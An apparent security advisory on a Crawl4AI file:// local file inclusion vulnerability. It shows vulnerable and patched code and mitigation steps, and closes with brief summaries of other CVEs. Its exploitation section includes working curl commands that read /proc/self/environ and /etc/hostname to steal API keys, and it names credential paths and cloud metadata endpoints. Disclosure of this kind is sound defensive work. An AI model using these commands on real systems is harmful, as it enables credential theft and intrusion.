Feb 17, 2026·6 min read·22 visits
Crawl4AI exposed a headless browser via API without validating URL schemas. Attackers can use `file:///etc/passwd` or `file:///proc/self/environ` to read server files and steal API keys. Fixed in version 0.8.0.
A critical Local File Inclusion (LFI) vulnerability in Crawl4AI's Docker API allows unauthenticated attackers to abuse the `file://` protocol. By leveraging the headless browser intended for web scraping, attackers can read arbitrary files from the host filesystem, including sensitive environment variables and credentials.
In the gold rush of 2025, everyone needed data to feed their hungry Large Language Models. Enter Crawl4AI, a nifty tool designed to turn the chaotic web into clean, LLM-ready JSON. It’s a developer favorite because it abstracts away the nightmare of managing headless browsers like Chromium. You spin up a Docker container, send it a URL, and it politely hands back the content. Simple, right?
But here is the problem with abstraction: it hides the monsters. When you deploy Crawl4AI's Docker API, you are essentially exposing a full-featured web browser to the internet. Browsers are designed to be helpful. They want to render images, execute JavaScript, and—if you ask nicely—open local files.
CVE-2026-26217 is what happens when you hand a loaded browser to the public internet without checking the safety. It turns out, if you asked Crawl4AI to "crawl" your own hard drive using the file:// protocol, it wouldn't just comply; it would take a screenshot, convert it to PDF, or extract the text and serve it up on a silver platter. It’s not just a bug; it’s an architectural oversight that turns a scraping tool into a file exfiltration cannon.
The vulnerability lies in a classic failure of input validation, specifically regarding Uniform Resource Identifier (URI) schemes. The Crawl4AI API endpoints—/execute_js, /screenshot, /pdf, and /html—accept a JSON payload containing a url parameter. The application logic takes this string and passes it directly to the underlying browser automation library (likely Playwright or Puppeteer).
Under normal circumstances, a browser should be able to open local files. If you double-click an HTML file on your desktop, Chrome opens it. That's a feature. However, in a server-side context, this feature becomes a critical vulnerability known as Local File Inclusion (LFI) or Server-Side Request Forgery (SSRF) with local access.
> [!NOTE]
> The Protocol Problem
> The root cause isn't that the code was complex; it's that it was too simple. It lacked an allowlist. It implicitly trusted that the user would only provide http:// or https:// URLs.
By supplying a URI like file:///etc/passwd, the attacker instructs the headless browser to navigate to the local file system. Because the browser process (running inside the container) has read permissions for standard system files, it renders the file content just as it would render a webpage. The API then packages this content into the response, completing the exfiltration loop.
Let's look at a reconstruction of the vulnerable logic versus the patched approach. The vulnerability exists because the URL is passed raw to the browser navigation method.
In the vulnerable versions (< 0.8.0), the handler for the /html endpoint looked something like this:
@app.post("/html")
async def get_html(request: CrawlRequest):
# ❌ FATAL ERROR: No validation of request.url
# The browser blindly follows the file:// protocol
await page.goto(request.url)
content = await page.content()
return {"html": content}The patch introduces a strict protocol check. Before the URL touches the browser, it must pass a schema validation check.
from urllib.parse import urlparse
@app.post("/html")
async def get_html(request: CrawlRequest):
parsed = urlparse(request.url)
# ✅ SECURITY FIX: Enforce HTTP/HTTPS
if parsed.scheme not in ["http", "https"]:
raise HTTPException(status_code=400, detail="Invalid protocol")
await page.goto(request.url)
content = await page.content()
return {"html": content}This simple check neutralizes the attack. If an attacker tries to pass file:///etc/shadow, the urlparse logic sees the scheme as file, the check fails, and the request is rejected before the browser is even invoked.
Exploiting this vulnerability is trivial and requires no authentication in the default Docker configuration. We can use standard curl commands to extract data. The most dangerous vector here isn't necessarily /etc/passwd—it's the environment variables.
Since this tool is built for AI workflows, it is highly likely that the container environment contains API keys for OpenAI, Anthropic, or AWS credentials.
We check if the server is vulnerable by trying to read the /etc/hostname file, which is present in almost every Docker container.
curl -X POST http://target:8080/html \
-H "Content-Type: application/json" \
-d '{"url": "file:///etc/hostname"}'If the server responds with the hostname, we escalate immediately to /proc/self/environ. This file contains the environment variables for the current process, separated by null bytes.
curl -X POST http://target:8080/execute_js \
-H "Content-Type: application/json" \
-d '{
"url": "file:///proc/self/environ",
"scripts": ["document.body.innerText"]
}'The Output:
Instead of a webpage, the attacker receives a JSON response containing strings like:
OPENAI_API_KEY=sk-proj-12345...\u0000AWS_ACCESS_KEY_ID=AKIA...
With these keys, the attacker can pivot from the simple scraper container to the victim's cloud infrastructure or drain their AI credits.
While CVSS 9.2 sounds high (and it is), the real impact depends on context. If Crawl4AI is running on a developer's laptop, the attacker reads their local files. If it's running in a Kubernetes cluster, the attacker reads the Service Account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
http://localhost:80 or http://169.254.169.254 (cloud metadata services) to steal IAM roles.This is a "game over" vulnerability for the confidentiality of the container and potentially the hosting infrastructure.
The remediation is straightforward, but urgency is required. The exploit is public, simple, and scriptable.
1. Update Immediately:
Pull the latest Docker image. Version 0.8.0 and above contain the fix.
docker pull unclecode/crawl4ai:latest2. Network Segmentation: Even with the patch, a scraping tool should never have unfettered access to internal networks. Ensure the container typically has no egress access to internal subnets (10.0.0.0/8, 192.168.0.0/16) and block access to cloud metadata IPs (169.254.169.254).
3. Run with Least Privilege:
Do not run the container as root. While this doesn't stop the LFI of world-readable files, it prevents access to /etc/shadow or other root-owned sensitive data.
4. Authentication: The default Crawl4AI Docker setup does not enforce authentication. Put it behind a reverse proxy (Nginx, Traefik) that enforces Basic Auth or API key validation. Do not expose port 8080 to the public internet.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
Crawl4AI unclecode | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-22 (Path Traversal) |
| CVSS v4.0 | 9.2 (Critical) |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N |
| Attack Vector | Network (API) |
| Exploit Status | PoC Available / Active |
| Impact | Information Disclosure (High) |
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
GeoNode versions prior to 4.4.5 and 5.0.2 are vulnerable to Server-Side Request Forgery (SSRF) in the service registration endpoint. Authenticated attackers with low privileges can exploit insufficient input validation in the Web Map Service (WMS) registration module to force the application server to make outbound network queries to loopback addresses, private RFC1918 subnets, link-local scopes, and cloud metadata endpoints. This technical report details the mechanics of the vulnerability, the underlying architectural flaw, and how to effectively remediate and mitigate the associated security risks.
CVE-2022-0492 is a high-severity missing authorization vulnerability in the Linux kernel's Control Groups (cgroups) v1 implementation. The flaw resides within the cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c, where the kernel fails to validate if the process writing to the release_agent file possesses administrative capabilities in the initial user namespace. This allows a local attacker inside a container with root privileges (UID 0) to abuse user namespaces, mount a cgroups v1 directory, modify the release_agent parameter, and execute arbitrary commands on the host system as host root, effectively achieving a complete container escape.
NocoDB is subject to an insufficient session expiration vulnerability where OAuth access and refresh tokens are not invalidated or revoked during security-sensitive actions such as password changes, forgot-password requests, or password resets. This allows an attacker possessing an active OAuth token to maintain unauthorized persistence.
A vulnerability in the vantage6 federated learning framework allows unauthenticated remote attackers to gain administrative control of the server via hardcoded default credentials (root/root) when deployed under default configurations in versions 4.2.3 and below.
An improper access control vulnerability in the vantage6 node component allows concurrently running algorithm containers to read and modify sensitive input and output files of other tasks. The lack of strict workspace directory isolation exposes a significant attack surface in multi-tenant or federated environments where untrusted algorithms are executed.
TinyMCE versions 6.8.0 through 7.0.1 contain a high-severity Cross-Site Scripting (XSS) vulnerability. The flaw exists in the custom HTML parser and sanitizer module, which incorrectly manages SVG namespace scopes when parsing nested elements. A low-privileged or unauthenticated attacker can submit a crafted HTML payload containing nested SVG structures to bypass sanitization filters, leading to arbitrary JavaScript execution in the context of the victim's browser session.